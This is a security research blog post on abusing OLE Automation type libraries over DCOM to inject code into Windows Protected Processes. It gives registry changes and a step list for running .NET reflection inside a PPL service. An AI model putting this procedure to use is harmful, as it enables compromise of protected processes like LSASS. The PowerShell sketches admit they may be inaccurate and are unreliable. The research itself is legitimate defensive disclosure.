The ITypeInfo interface exposes two interesting methods that can be called by a client: Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes, as it's not supported for remoting; it can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable: it will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially, the created object will live in the server's process, not the client's.
However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface can represent any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, so calling CreateInstance on it will just return an error. However, the type library can also store information about "CoClass" types. These types define the CLSID of the object to create, so calling CreateInstance on them will succeed.
How can we go from the interface type information object, to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module, first we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation.
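A sketch of that query using the OleView.NET PowerShell module follows; the cmdlet and property names are reconstructed from memory and may differ slightly from the module's actual syntax:

```powershell
# Sketch: enumerate COM classes hosted in local services, query their
# supported interfaces, then keep the ones exposing IDispatch.
$classes = Get-ComClass -Service
$classes | ForEach-Object { Get-ComInterface -Class $_ | Out-Null }
$candidates = $classes | Where-Object { $_.Interfaces.Name -contains "IDispatch" }
$candidates | Select-Object Name, Clsid
```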
The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces; we don't need the output from this command, as the queried interfaces are stored in the Interfaces property. Finally, we select out any COM class which exposes IDispatch, resulting in 5 candidates. Next, we'll pick the first class, WaaSRemediationAgent, and inspect its type library for interesting classes.
The script creates the COM object and then uses the Import-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef then extracting the process information, showing it running in an instance of svchost.exe, which is the shared service executable. Inspecting the type library through the interface is painful; to make it easier to display what classes are supported, we can parse the library into an easier-to-use object model with the Parse method. We can then dump information about the library, including a list of its classes.
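The inspection described above might look roughly like this; again a sketch, with the exact OleView.NET cmdlet and property names from memory:

```powershell
# Sketch: create the service object, import its type library, confirm
# which process the library interface lives in, then parse it.
$obj = New-ComObject -Class $candidates[0]
$lib = Import-ComTypeLib -Object $obj
Get-ComObjRef -Object $lib          # shows the hosting svchost.exe instance
$parsed = $lib.Parse()
$parsed.Classes | Select-Object Name
```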
Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service.
I inspected the other four COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible; they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look.
In the example we can use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry for stdole, which is basically always going to be imported. If you're lucky, maybe there are other imported libraries you can inspect. We can parse the stdole library to inspect its list of classes. There are two classes exported by the type library; if we inspect the servers for StdFont, we can see that it is only specified to be creatable in-process, so we now have a target class to look for bugs. To get an out-of-process interface for the stdole type library we need to find a type which references it. The reason for the reference is that common interfaces such as IUnknown and IDispatch are defined in that library, so we need to query the base type of an interface we can directly access. Let's try to create the object in the COM service.
We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process; the results show it's trapped in the service process. As a final check we can query for the object's interfaces to prove that it's a font object.
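The steps above can be sketched as follows. Raw ITypeInfo/ITypeLib method names are used; the PowerShell wrappers may expose them slightly differently, and the StdFont CLSID is the standard stdole one:

```powershell
# Sketch: hop from a reachable interface's base type to the stdole
# library, then create StdFont inside the service process.
$href   = $typeInfo.GetRefTypeOfImplType(0)   # base type, e.g. IDispatch
$base   = $typeInfo.GetRefTypeInfo($href)
$stdole = $base.GetContainingTypeLib()
$parsed = $stdole.Parse()                     # confirm it's really stdole
$fontTi = $stdole.GetTypeInfoOfGuid("0BE35203-8F91-11CE-9DE3-00AA004BB851")
$font   = $fontTi.CreateInstance()
Get-ComObjRef -Object $font                   # trapped in the service process
```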
Now we just need to find a way of exploiting one of these two classes; the first problem is that only the StdFont object can be accessed. The StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead.
This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox, but an initial analysis of those accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this, I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont to point at any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script.
Still, injection techniques are not something I'd usually discuss on this blog; that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride. When we inspect the protection level for the hosting service, we find it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.
Protected Process Injection
I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background on previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary, so they won't generally fix any bugs via a security bulletin in a timely manner, though they might choose to fix them in a new version of Windows.
The idea is simple: we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running in the protected process. Targeting StdFont keeps the technique generic, as we could move to a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution and which also works in a protected process.
Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, you'll know the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged before about how .NET DCOM is exploitable and shouldn't be used, but in this case we want the bugginess.
The blog post discussed exploiting serialization primitives; however, there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array, which would bypass the signature checking and give full control over the protected process.
Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information anyway, we can just enable DCOM reflection by writing the AllowDCOMReflection value as a DWORD of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process.
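That registry change, expressed as a .reg fragment (the key and value are taken directly from the text above):

```reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework]
"AllowDCOMReflection"=dword:00000001
```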
The following steps need to be taken to achieve injection:
Enable DCOM reflection in the registry.
Add the TreatAs key to redirect StdFont to the System.Object COM class.
Create the WaaSRemediationAgent object.
Use the type library to get the StdFont class type info.
Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.
Create an object in the loaded assembly to force code to execute.
Clean up all registry changes.
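Step 2 can be sketched as a .reg fragment. The StdFont CLSID shown is the standard one from stdole; the redirect target is a placeholder for the CLSID under which the System.Object COM class is registered, which you'd need to look up on the target system:

```reg
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\TreatAs]
@="{CLSID-of-the-System.Object-COM-class}"
```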
You'll need to do these steps in a non-.NET language, as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you could probably do it from something like Python if you're so inclined. I'm not going to make the PoC available, but the code is very similar to the exploit I wrote for CVE-2014-0257; that'll give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework, which is no longer installed by default. Rather than mess around with getting this working with v4, I just installed v2 from the Windows components installer.
My PoC worked first time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on the object failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point, but I wanted to know what was failing on Windows 11. Let's finish up by diving into that, to see if we can do something to get it to work on the latest version of Windows.
The Problem with Windows 11
I was able to prove that the issue was related to protected processes: if I changed the service registration to run unprotected, the PoC worked. Therefore there must be something blocking the loading of the library specifically when running in a protected process. This didn't seem to impact type libraries generally; the loading of stdole worked just fine, so it was something specific to .NET.
After inspecting the behavior of the PoC with Process Monitor, it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what was happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to be loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick.
Digging into oleaut32.dll I found the offending fix, in a method named VerifyTrust.
This method is called during the loading of the type library. It uses the cached signing level, again something I mentioned in the previous blog post, to verify whether the file has a signing level of 12, which corresponds to the Windows signing level. If it doesn't have the appropriate cached signing level, the code will try to use NtSetCachedSigningLevel to set it. If that fails, it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note that a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion.
Based on the output from Get-AuthenticodeSignature, the mscorlib.tlb file is signed, admittedly via a catalog signature. The signing certificate is Microsoft Windows Production PCA 2011, which is exactly the same certificate as the .NET runtime DLL, so there should be no reason it wouldn't get a Windows signing level. Let's try to set the cached signing level manually using my NtObjectManager PowerShell module to see if we get any insights:
[Listing elided: setting the cached signing level fails, followed by a hex dump of the first 64 bytes of mscorlib.tlb.]
Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of the type library file shows that it's a raw type library rather than one packaged in a PE file. This is fairly uncommon on Windows; even when a file has the extension TLB, it's common for the type library to be packed into a PE file as a resource. I guess we're out of luck: unless we can set a cached signing level on the file, it will be blocked from loading into the protected process, and we need it to load to support the stub class used to call the .NET interfaces over DCOM.
As an aside, oddly I have a VM of Windows 11 with the non-DLL form of the type library which does work to set a cached signing level. I must have changed the VM's configuration in some way to support this feature, but I've no idea what that is and I've decided not to dig further into it.
We could try to find a previous version of the type library file which is both validly signed and packaged in a PE file; however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution, but I'd set my heart on this approach. In the end the solution was simpler than I expected: for some reason the 32-bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it.
Thus, to exploit this on Windows 11 24H2, we can swap the type library registration path from the 64-bit version to the 32-bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us, so we don't need to do anything else to make it work. Even though it's technically a different version of the type library, that doesn't make any difference for our use case, and the stub generator code doesn't care.
Conclusions
In this blog post I discussed an interesting bug class on Windows, although it is applicable to any similar object-orientated cross-process or remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries.
While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level, it allows access to the majority of processes running protected, including LSASS. We saw that Microsoft has done some work to mitigate existing attacks such as type library type-confusions, but in our case that mitigation shouldn't have blocked the load, as we didn't need to change the type library itself. While the attack required admin privileges, the general technique does not: as a normal user you could modify the local user's COM and .NET registration to perform the attack and inject into a PPL, if you can find a suitable COM server exposing IDispatch.